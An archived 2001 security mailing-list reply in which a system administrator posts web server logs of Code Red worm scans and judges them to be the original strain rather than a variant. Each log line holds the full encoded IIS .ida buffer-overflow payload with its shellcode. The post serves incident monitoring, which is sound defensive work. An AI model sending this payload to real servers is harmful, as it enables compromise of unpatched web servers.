RE: Code Red, anyone?

From: Chip McClure (vhm3at_private)
Date: Wed Aug 01 2001 - 07:52:38 PDT

Next message: Jim Forster: "Snort Rules"

Previous message: Jim Forster: "CodeRed"
In reply to: Information Security: "RE: Code Red, anyone?"
Next in thread: Jürgen Nieveler: "RE: Code Red, anyone?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So far, there's been very little on the 3 Class C addresses, plus my home
system I administer. If it is anything like the last round, the cacade
effect picks up in a few hours.

I really doubt whether it is going to be anything like last time,
comparing with the last wave at the same time, traffic was a lot heavier.

Cuts from my various log files so far:

node1445a.a2000.nl - - [01/Aug/2001:06:48:34 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 327 "-" "-"

212.175.50.7 - - [01/Aug/2001:04:54:46 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 280 "-" "-"
207.165.180.1 - - [01/Aug/2001:05:17:53 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 280 "-" "-"

24.77.244.19 - - [01/Aug/2001:06:34:34 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 331 "-" "-"

The connection strings are exactly the same as the original scans, so I'd
say we haven't yet got hit with any of the variants.

Chip McClure
Sr Unix Administrator
GigGuardian, Inc

http://www.gigguardian.com/

On Wed, 1 Aug 2001, Information Security wrote:

> We've had 4 attempts at our class C into our web servers, as reported by our
> firewall.  They were at 2:44, 5:12, 6:01 and 6:36AM EST.
>
> So there must be activity out there, just not very much--?  Any one else?

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Made with pgp4pine 1.76

iQA/AwUBO2gXvIxq/3tb9j7EEQJciwCfWiY/7SAVo+CLUxHpfAO7b7YEg7cAoIrp
TwIfYQfSlyRmJM5gc1HGAJB9
=Wukv
-----END PGP SIGNATURE-----



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Jim Forster: "Snort Rules"
Previous message: Jim Forster: "CodeRed"
In reply to: Information Security: "RE: Code Red, anyone?"
Next in thread: Jürgen Nieveler: "RE: Code Red, anyone?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 08:17:57 PDT